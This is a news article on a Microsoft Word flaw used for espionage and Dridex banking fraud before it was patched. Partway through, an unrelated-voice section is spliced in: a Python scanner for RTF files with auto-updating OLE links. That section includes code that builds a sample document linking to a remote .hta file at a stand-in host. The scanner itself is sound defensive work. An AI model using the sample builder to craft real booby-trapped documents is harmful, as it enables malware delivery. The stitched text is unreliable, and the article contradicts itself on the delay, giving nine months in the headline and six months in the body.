Microsoft took 9 MONTHS to solve a Word bug that let hackers take control of computers and spy on millions

  • Dangerous bug allowed hackers to insert a link to malware in Word documents 
  • Criminals used the bug to send spying software to soldiers in Russia and Ukraine
  • Hackers then sent banking-fraud software to millions of computers in Australia

A dangerous security problem in Microsoft Word took so long to fix that hackers were able to use it to spy on millions of people.

While Microsoft struggled to come up with a fix, hackers used the bug to take control of computers and send spying and banking-fraud software.

Criminals even used the bug to spy on the computers of soldiers in Russia and Ukraine, it was revealed today. 


A dangerous security problem in Microsoft Word took so long to fix that hackers were able to use it to spy on millions of people (stock image)

TIMELINE OF EVENTS 

July 2016:  Ryan Hanson, a 2010 Idaho State University graduate and consultant at boutique security firm Optiv Inc in Boise, found a weakness in the way that Microsoft Word processes documents from another format.

October 2016: Mr Hanson told Microsoft about the threat.

But the company failed to act to remove the bug. 

January 2017: Hackers discover the flaw and cyber attacks begin.

The first known victims were sent emails enticing them to click on a link to documents in Russian about military issues, researchers said.

Their computers were then infected with eavesdropping software made by Gamma Group, a private company that sells to agencies of many governments.

March 2017: Hackers start using the bug to send financial hacking software to a small number of computers.

April 7: Security firm McAfee notices the problem and raises the alarm in a blog post.

But the post alerts many more hackers to the deadly security flaw.

April 8: Attacks go mainstream. Someone uses the bug to send documents booby-trapped with banking-fraud software to millions of computers in Australia.

April 11: Microsoft finally releases a patch to fix the bug in a security update.

It is unclear how many people were ultimately infected or how much money was stolen. 


The bug allowed a hacker to seize control of a personal computer with little trace.

It was finally fixed on April 11 after nine months of inaction from the tech giant, which cyber security experts say is an unusually long time.

Google's security researchers, for example, give vendors just 90 days' warning before publishing flaws they find. 

Microsoft declined to say how long it usually takes to patch a flaw.

While Microsoft investigated, hackers found the flaw and manipulated the software to spy on unknown Russian speakers, possibly in Ukraine.

And a group of thieves used it to bolster their efforts to steal from millions of online bank accounts in Australia and other countries.

Last July, Ryan Hanson, a 2010 Idaho State University graduate and consultant at boutique security firm Optiv Inc in Boise, found a weakness in the way that Microsoft Word processes documents from another format. 

That allowed him to insert a link to a malicious programme that would take control of a computer.

Hanson spent some months combining his find with other flaws to make it more deadly, he said on Twitter. 

Then in October he told Microsoft. The company often pays a modest bounty of a few thousand dollars for the identification of security risks.

Soon after that point six months ago, Microsoft could have fixed the problem, the company acknowledged. But it was not that simple. 

A quick change to Word's settings by customers would have blocked the attack, but if Microsoft notified customers about the bug and the recommended change, it would also be telling hackers how to break in.

Alternatively, Microsoft could have created a patch that would be distributed as part of its monthly software updates. 

But the company did not patch immediately and instead dug deeper.

It was not aware that anyone was using Hanson's method, and it wanted to be sure it had a comprehensive solution.

A previously undiscovered exploit in Microsoft Word is being used to spread trojan software called Dridex. Victims get an email which appears to be from a reputable bank or financial firm with an infected Word document attached (pictured)

'We performed an investigation to identify other potentially similar methods and ensure that our fix addresses more than just the issue reported,' Microsoft said through a spokesman, who answered emailed questions on the condition of anonymity. 'This was a complex investigation.'

Hanson declined interview requests.

The saga shows that Microsoft's progress on security issues, as well as that of the software industry as a whole, remains uneven in an era when the stakes are growing dramatically.

The United States has accused Russia of hacking political party emails to interfere in the 2016 presidential election, a charge Russia denies.

The flaw allows cyber criminals to insert hidden malicious code into the body of a document. By clicking on a pop-up (pictured) to accept additional data being imported into the document, the HTML-based malware is able to infect your computer
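The article describes the mechanism only in outline: a link planted in a document "from another format" that pulls additional data from outside when Word opens it. The scanner below is an added example, not code from the article or from Microsoft, Optiv, FireEye or McAfee. It assumes that the other format is RTF (the article never names it), that the planted link is an RTF `{\object ...}` group whose `\objdata` payload begins with an OLE1 ObjectHeader as laid out in Microsoft's MS-OLEDS specification, and that an auto-updating linked object whose target is a remote URL or a script file is worth flagging. The two sample documents and the list of suspicious extensions are constructed for the example.

```python
import re
import struct

# Heuristic scanner for RTF documents carrying OLE objects that Word would refresh
# from an external link. Assumption (not stated by the article): the document is
# RTF and the link sits in an {\object ...} group whose \objdata payload starts
# with an OLE1 ObjectHeader (MS-OLEDS layout).

# Assumed heuristic list: link targets with these extensions are not documents.
SUSPICIOUS_TARGETS = (b".hta", b".exe", b".js", b".vbs", b".scr")

# Matches the hex payload of a {\*\objdata ...} destination group.
OBJDATA = re.compile(rb"\\\*\\objdata\s*([0-9a-fA-F\s]+)\}")


def extract_groups(data: bytes, marker: bytes):
    """Yield each brace-balanced RTF group that begins with `marker`.
    Escaped braces (\\{ and \\}) are ignored for brevity."""
    start = 0
    while True:
        i = data.find(marker, start)
        if i < 0:
            return
        depth, end = 0, -1
        for j in range(i, len(data)):
            c = data[j:j + 1]
            if c == b"{":
                depth += 1
            elif c == b"}":
                depth -= 1
                if depth == 0:
                    end = j
                    break
        if end < 0:
            return  # unbalanced group: stop scanning
        yield data[i:end + 1]
        start = end + 1


def parse_ole1_header(blob: bytes):
    """Parse an OLE1 ObjectHeader: version, FormatID (1 = linked, 2 = embedded)
    and three length-prefixed ANSI strings (class name, topic, item)."""
    if len(blob) < 8:
        return None
    version, format_id = struct.unpack_from("<II", blob, 0)
    pos, names = 8, []
    for _ in range(3):
        if pos + 4 > len(blob):
            return None
        (n,) = struct.unpack_from("<I", blob, pos)
        pos += 4
        names.append(blob[pos:pos + n].rstrip(b"\0"))
        pos += n
    return {"version": version, "format_id": format_id,
            "class_name": names[0], "topic": names[1], "item": names[2]}


def scan_rtf(data: bytes) -> list:
    """Return one finding per \\object group that looks like an auto-updating or remote link."""
    findings = []
    for group in extract_groups(data, rb"{\object"):
        reasons = []
        if b"\\objautlink" in group or b"\\objupdate" in group:
            reasons.append("auto-updating link")
        header, target = None, b""
        m = OBJDATA.search(group)
        if m:
            try:
                blob = bytes.fromhex(re.sub(rb"\s+", b"", m.group(1)).decode("ascii"))
            except ValueError:
                blob = b""
            header = parse_ole1_header(blob)
            if header:
                target = header["topic"]
                if header["format_id"] == 1:
                    reasons.append("OLE1 linked object")
        low = target.lower()
        if low.startswith((b"http://", b"https://", b"\\\\")):
            reasons.append("remote link target")
        if low.endswith(SUSPICIOUS_TARGETS):
            reasons.append("script/executable target")
        if reasons:
            findings.append({
                "class_name": (header["class_name"] if header else b"").decode("latin-1"),
                "target": target.decode("latin-1"),
                "reasons": reasons,
            })
    return findings


def build_ole1_link_header(class_name: bytes, topic: bytes, item: bytes = b"") -> bytes:
    """Build an OLE1 linked-object header; used only to construct the sample below."""
    hdr = struct.pack("<II", 0x00000501, 0x00000001)
    for s in (class_name, topic, item):
        hdr += struct.pack("<I", len(s) + 1) + s + b"\0"
    return hdr


# Constructed samples (not real malware): a document with an auto-updating link to a
# remote .hta hidden behind a Word class name, and a plain document with no object.
_LINK_HEX = build_ole1_link_header(
    b"Word.Document.8", b"http://example.invalid/update.hta").hex().encode("ascii")
SAMPLE_LINKED_RTF = (
    rb"{\rtf1\ansi Quarterly report "
    rb"{\object\objautlink\objupdate\objw1\objh1"
    rb"{\*\objclass Word.Document.8}"
    rb"{\*\objdata " + _LINK_HEX + rb"}}}"
)
SAMPLE_CLEAN_RTF = rb"{\rtf1\ansi Quarterly report, nothing embedded.}"

if __name__ == "__main__":
    for finding in scan_rtf(SAMPLE_LINKED_RTF):
        print(finding)
    print("clean document findings:", scan_rtf(SAMPLE_CLEAN_RTF))
```

Run it on a directory of mail attachments and the interesting signal is the combination: a linked (not embedded) OLE1 object, marked for automatic update, whose target is a URL or a script rather than a document. Any one of those alone is common in legitimate files; all three together is what a mail gateway or endpoint sensor should quarantine for analyst review, whether or not the client is patched.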

Meanwhile, shadowy hacker groups opposed to the U.S. government have been publishing hacking tools used by the Central Intelligence Agency and National Security Agency.

It is unclear how the unknown hackers initially found Hanson's bug. 

WHAT IS DRIDEX? 

Dridex is online banking malware that steals personal information; it is delivered by attaching HTML-based code to innocuous-looking documents.

The victim gets an email with a Microsoft Word or Excel document attached.

The attackers lure victims into opening the attachment by using the names of legitimate companies.

Some of the emails refer to an 'attached invoice', stating it comes from a software company, online retailer or bank.

In the past, it has mainly targeted customers of financial and banking institutions based in Europe, according to computer security firm Symantec. 


It could have been through simultaneous discovery, a leak in the patching process, or even hacking against Optiv or Microsoft.

In January, as Microsoft worked on a solution, the attacks began.

The first known victims were sent emails enticing them to click on a link to documents in Russian about military issues in Russia and areas held by Russian-backed rebels in eastern Ukraine, researchers said. 

Their computers were then infected with eavesdropping software made by Gamma Group, a private company that sells to agencies of many governments.

The best guess of cyber security experts is that one of Gamma's customers was trying to get inside the computers of soldiers or political figures in Ukraine or Russia.

Either of those countries, or any of their neighbors or allies, could have been responsible.

The initial attacks were carefully aimed at a small number of targets and so stayed below the radar. 

But in March, security researchers at FireEye Inc noticed that a notorious piece of financial hacking software known as Latentbot was being distributed using the same Microsoft bug.

FireEye probed further, found the earlier Russian-language attacks, and warned Microsoft. 

The company, which confirmed it was first warned of active attacks in March, got on track for an April 11 patch.

Then, what counts as disaster in the world of bug-fixers struck. Another security firm, McAfee, saw some attacks using the Microsoft Word flaw on April 6.

After what it described as 'quick but in-depth research,' it established that the flaw had not been patched, contacted Microsoft, and then blogged about its discovery on April 7.

The blog post contained enough detail that other hackers could mimic the attacks.

Other software security professionals were aghast that McAfee did not wait, as Optiv and FireEye were doing, until the patch came out.

McAfee Vice President Vincent Weafer blamed 'a glitch in our communications with our partner Microsoft' for the timing. He did not elaborate.

By April 9, a programme to exploit the flaw was on sale on underground markets for criminal hackers, said FireEye researcher John Hultquist.

The next day, attacks were mainstream. Someone used it to send documents booby-trapped with Dridex banking-fraud software to millions of computers in Australia.

Finally, on Tuesday, April 11, about six months after hearing from Hanson, Microsoft made the patch available. 

As always, some computer owners are lagging behind and have not installed it.

Ben-Gurion University employees in Israel were hacked, after the patch, by attackers linked to Iran who took over their email accounts and sent infected documents to their contacts, said cyber security firm Morphisec.

When Microsoft patched, it thanked Hanson, a FireEye researcher and its own staff.

A six-month delay is bad but not unheard of, said Marten Mickos, chief executive of HackerOne, which coordinates patching efforts between researchers and vendors.

'Normal fixing times are a matter of weeks,' Mickos said.

It is unclear how many people were ultimately infected or how much money was stolen.